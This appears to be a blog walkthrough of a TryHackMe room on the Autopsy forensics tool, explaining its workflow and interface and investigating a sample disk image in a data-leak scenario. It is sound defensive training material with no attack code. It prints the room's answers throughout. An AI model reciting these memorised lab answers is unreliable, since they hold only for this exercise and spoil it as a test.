All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Introduction

What is Autopsy?

The official description: "Autopsy is the premier open source forensics platform which is fast, easy-to-use, and capable of analyzing all types of mobile devices and digital media. Its plug-in architecture enables extensibility from community-developed or custom-built modules. Autopsy evolves to meet the needs of hundreds of thousands of professionals in law enforcement, national security, litigation support, and corporate investigation."

Autopsy is a powerful tool. Several features within Autopsy were developed thanks to the Department of Homeland Security Science and Technology funding. You can read more about this here.

Learn how to use Autopsy to investigate artifacts from a disk image. Use your knowledge to investigate an employee who is being accused of leaking private company data.TryHackme



This room's objective is to provide an overview of how to use the Autopsy tool to perform analysis on disk images and the assumption is that you are familiar with the Windows operating system and Windows artifacts in relation to forensics.

Installation

Installing Autopsy for Windows is pretty straightforward.


Visit the Autopsy download page and download the Windows MSI, which corresponds to your Windows architecture, 32bit or 64bit.

•     Run the Autopsy MSI file
•     If Windows prompts with User Account Control, click Yes
•     Click through the dialog boxes until you click a button that says Finish

Autopsy is also available for Linux and macOS. Follow the install instructions provided on the Autopsy website.

If you use Kali Linux, Autopsy is already installed.

Workflow Overview

Before diving into Autopsy and analyzing data, there are a few steps to perform, such as identifying the data source and what Autopsy actions to perform with the data source.



Your basic workflow:

•     Create the case for the data source you will investigate
•     Select the data source you wish to analyze
•     Configure the ingest modules to extract specific artifacts from the data source
•     Review the artifacts extracted by the ingest modules
•     Create the report

Below is a visual of step #1.


When you start Autopsy, there will be 3 options. To start a new case, click on New Case.

The next screen is titled Case Information, and this is where information about the case is populated.

• Case Name: The name you wish to give to the case
•  
• Base Directory: The root directory that will store all the files specific to the case (the full path will be displayed)
•  
  
• Case Type: Specify whether this case will be local (Single-user) or hosted on a server where multiple analysts can review (Multi-user)

Note: In this room, the focus is on Single-User.



The screen that follows is titled, Optional Information and it can be left blank for our purposes. In an actual forensic environment, you should fill out this information.  When you're done, click Finish.


In this room, you will import a case. To open a case, you will select is Open Case.

Autopsy case files have an .aut file extension. Navigate to the case folder and select the .aut file you wish to open. 

Next, Autopsy will process the case files open the case.

You can identify the name of the case at the top left corner of the Autopsy window. In the image below, the name of this case is Tryhackme.


 

 
Note: If Autopsy is unable to locate the disk image, a warning box will appear. At this point, you can point Autopsy to the location of the disk image it's attempting to find, or you can click NO; you can still analyze the data from the Autopsy case.

 
Once the case you wish to analyze is open, you are ready to start analyzing the data. 

1) Autopsy files end with which file extension?

Ans :- .aut

Data Sources

Before diving into analyzing the data, let's briefly cover the different data sources Autopsy can analyze.

Below is a screenshot of the Add Data Source Windows dialog box.

 


In this room, we will focus primarily on the first option, Disk Image or VM file.


Supported Disk Image Formats:

•     Raw Single (For example: *.img, *.dd, *.raw, *.bin)
•     Raw Split (For example: *.001, *.002, *.aa, *.ab, etc)
•     EnCase (For example: *.e01, *.e02, etc)
•     Virtual Machines (For example: *.vmdk, *.vhd)

If there are multiple image files (e.i. E01, E02, E03, etc.) Autopsy only needs you to point to the first image file, and Autopsy will handle the rest. 

Note: Refer to the Autopsy documentation to understand the other data sources that can be added to a case.

Below is a screenshot of an E01 disk image added to a sample case as a data source.

 

Specify the time zone and click Next.

Note: Orphan files are deleted files that no longer have a parent folder. In FAT file systems, it can be time-sensitive to read and analyze.


 
1) In the above screenshot, what is the disk image format for SUSPECTHD?

Ans :- Encase

Ingest Modules

Essentially Ingest Modules are Autopsy plug-ins. Each Ingest Module is designed to analyze and retrieve specific data from the drive.

Below is a screenshot of the Configure Ingest Modules window.

By default, the Ingest Modules are configured to run on All Files, Directories, and Unallocated Space.

 

The other two options are:

•     All Files and Directories (Not Unallocated Space)
•     Create/edit file ingest filters...

Note: We will not cover ingest filters in this room.


If all the Ingest Modules are deselected, and Next is selected, Autopsy will still process the data source and update the local database.

Note: Autopsy adds metadata about files to the local database, not the actual file contents.

When Autopsy is done, you will see the following:

To complete this process, click Finish.

In the below image, since the Ingest Modules were deselected, there aren't any results in the Results node.

 


The results of any Ingest Module you select to run against a data source will populate the Results node in the Tree view, which is the left pane of the Autopsy user interface.

You can run Ingest Modules at any time while the case is open. To do so, right-click on the data source and select Run Ingest Modules.

 
As Ingest Modules run, alerts may appear in the Ingest Inbox.

 


Below is an example of the Ingest Inbox after a few Ingest Modules have completed running. 

Drawing the attention back to the Configure Ingest Modules window, notice that some Ingest Modules have per-run settings and some do not.

For example, the Recent Activity Ingest Module does not have per-run settings. In contrast, the Hash Lookup Ingest Module does.


To learn more about Ingest Modules, read Autopsy documentation here.

The User Interface

Let's look at the Autopsy user interface, which is comprised of 5 primary areas:

•     Tree Viewer (Left pane)
•     Result Viewer (Top right pane)
•     Keyword Search (Upper Top Right)
•     Contents Viewer (Bottom right pane)
•     Status Area (Lower Bottom right)

Each area will be explained briefly below.

The Tree Viewer has 5 top-level nodes:

• Data Sources - all the data will be organized as you would typically see it in a normal Windows File Explorer. 
•  
• Views - files will be organized based on file types, MIME types, file size, etc. 
•  
• Results - as mentioned earlier, this is where the results from Ingest Modules will appear. 
•  
• Tags - will display files and/or results that have been tagged (read more about tagging here)
•  
• Reports - will display reports either generated by modules or the analyst. (read more about reporting here)

   
   

Refer to the Autopsy documentation on the Tree Viewer for more information here.




Result Viewer


Note: Don't confuse the Results node (from the Tree Viewer) with the Result Viewer.

When a volume, file, folder, etc., are selected from the Tree Viewer, additional information about the selected item is displayed in the Result Viewer.

For example, the Sample case's data source is selected, and now additional information is visible in the Results Viewer.

If a volume is selected, the Result Viewer's information will change to reflect the information in the local database for the selected volume.

Notice that the Result Viewer pane has 3 tabs: Table, Thumbnail, and Summary. The 2 above screenshots reflect the information displayed in the Table tab. 

The Thumbnail tab works best with image or video files. If the view of the above data is changed from Table to Thumbnail, not much information will be displayed. See below.

Volume nodes can be expanded, and an analyst can navigate the volume's contents, as they would a typical Windows system.

In the Views tree node, files are categorized by File Types - By Extension, By MIME Type, Deleted Files, and By File Size.

 

Tip: When it comes to File Types, pay attention to this section. An adversary can rename a file with a misleading file extension. So the file will be 'miscategorized' By Extension but will be categorized appropriately by MIME Type.

Expand By Extension and more children nodes appear, categorizing files even further (see below).

Refer to the Autopsy documentation on the Result Viewer for more information here.

Contents Viewer

From the Table tab in the Result Viewer, if you click any folder/file, additional information is displayed in the Contents Viewer pane.

In the above image, 3 columns might not be quickly understood what they represent.

    S = Score
   
   

The Score will show a red exclamation point for a folder/file marked/tagged as notable and a yellow triangle pointing downward for a folder/file that is marked/tagged as suspicious. These items can be marked/tagged by an Ingest Module or by the analyst.

    C = Comment
   
   

If a yellow page is visible in the Comment column, it will indicate that there is a comment for the folder/file.

    O = Occurrence
   
   

In a nutshell, this column will indicate how many times this file/folder has been seen in past cases (this will require the Central Repository)

Refer to the Autopsy documentation on the Contents Viewer for more information here.




Keyword Search

At the top right, you will find Keyword Lists and Keyword Search.

With Keyword Search, an analyst can perform an AD-HOC keyword search.

In the image above, the analyst is searching for the word 'secret.' Below are the search results.

Refer to the Autopsy documentation for more information on how to perform keyword searches with either option.


Status Area


Lastly, the Status Area is at the bottom right.

When Ingest Modules are running, a progress bar (along with the percentage completed) will be displayed in this area. If you click on the bar, more detailed information regarding the Ingest Modules is provided.


If the X (directly next to the progress bar) is clicked on, a prompt will appear confirming if you wish to end cancel the Ingest Modules.

Refer to the Autopsy documentation on the UI overview here.

Data Analysis

Case Scenario: An employee was suspected of leaking company data. A disk image was retrieved from the machine. You were assigned to perform the initial analysis. Further action will be determined based on the initial findings.

Reminder: Since the actual disk image is not in the attached VM, certain Autopsy sections will not display any actual data, only the metadata for that row within the local database. You can click No when you're notified about the 'Missing Image.' Additionally, you do not need to run any ingest modules in this exercise.







1) What is the full name of the operating system version?

Ans :- Windows 7 Ultimate Service Pack 1

2) What percentage of the drive are documents? Include the % in your answer.

Ans :- 40.8%

3) The majority of file events occurred on what date? (MONTH DD, YYYY)

Ans :- March 25, 2015

4) What is the name of an Installed Program with the version number of 6.2.0.2962?

Ans :- Eraser
 

5) A user has a Password Hint. What is the value?

Ans :- IAMAN

6) Numerous SECRET files were accessed from a network drive. What was the IP address?

Ans :- 10.11.11.128

7) What web search term has the most entries?

Ans :- information leakage cases
 

8) What was the web search conducted on 3/25/2015 21:46:44?

Ans :- anti-forensic tools

9) What binary is listed as an Interesting File?

Ans :- googledrivesync.exe

10) What self-assuring message did the 'Informant' write for himself on a Sticky Note? (no spaces)


Ans :-  Tomorrow...everything will be ok..

Visualization Tools

You may have noticed that other parts of the user interface weren't discussed as of yet.


Please refer to the Autopsy documentation for the following visualization tool:

 

• Images/Videos - http://sleuthkit.org/autopsy/docs/user-docs/4.12.0/image_gallery_page.html
   
• Communications - http://sleuthkit.org/autopsy/docs/user-docs/4.12.0/communications_page.html
   
• Timeline - http://sleuthkit.org/autopsy/docs/user-docs/4.12.0/timeline_page.html
•     

Note: Within the attached VM, you will NOT be able to practice with some of the visualization tools, except for Timeline.

Below is a screenshot of the Timeline.

The Timeline tool is composed of 3 areas:

• Filters - narrow the events displayed based on the filter criteria
• Events - the events are displayed here based on the View Mode
• Files/Contents - additional information on the event(s) is displayed in this area   

   
   

There are 3 view modes:

• Counts -  the number of events is displayed in a bar chart view
• Details - information on events is displayed, but they are clustered and collapsed, so the UI is not overloaded
• List - the events are displayed in a table view

In the above screenshot, the View Mode is Counts. Below is a screenshot of the Details View Mode.

The numbers (seen above) indicate the number of clustered/collapsed events for a specific time frame.

For example, for /Windows, there are 130,257 events between 2009-06-10 and 2010-03-18. See the below image.

To expand a cluster, click on the green icon with the plus sign. See the below example.

To collapse the events, click on the red icon with a minus sign.

Click the map marker icon with a plus sign if you wish to pin a group of events. This will move (pin) the events to an isolated section of the Events view.

To unpin the events, click on the map marker with the minus sign.

The last group of icons to cover are the eye icons. If you wish to hide a group of events from the Events view, click on the eye with a minus sign.

In the below screenshot, the clustered events for /Boot were hidden and were placed in Hidden Descriptions (in the Filters area).

 

 

Last but not least, below is a screenshot of the List View Mode.

This should be enough information to get you started interacting with the Timeline with some level of confidence.


1) Using the Timeline, how many results were there on 2015-01-12?

Ans :- 46

Conclusion

To conclude, there is more to Autopsy that wasn't covered in detail within this room.

Below are some topics that you should explore on your own to configure Autopsy to do more out of the box:

• Global Hash Lookup Settings
• Global File Extension Mismatch Identification Settings
• Global Keyword Search Settings
• Global Interesting Items Settings
• Yara Analyzer
•    

3rd Party modules are available for Autopsy. Visit the official SleuthKit GitHub repo for a list of 3rd party modules here.


The disk image used with this room's development was created and released by the NIST under the Computer Forensic Reference Data Sets (CFReDS) Project. It is encouraged to download the disk image, go through the full exercise (here) to practice using Autopsy, and level up your investigation techniques.

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)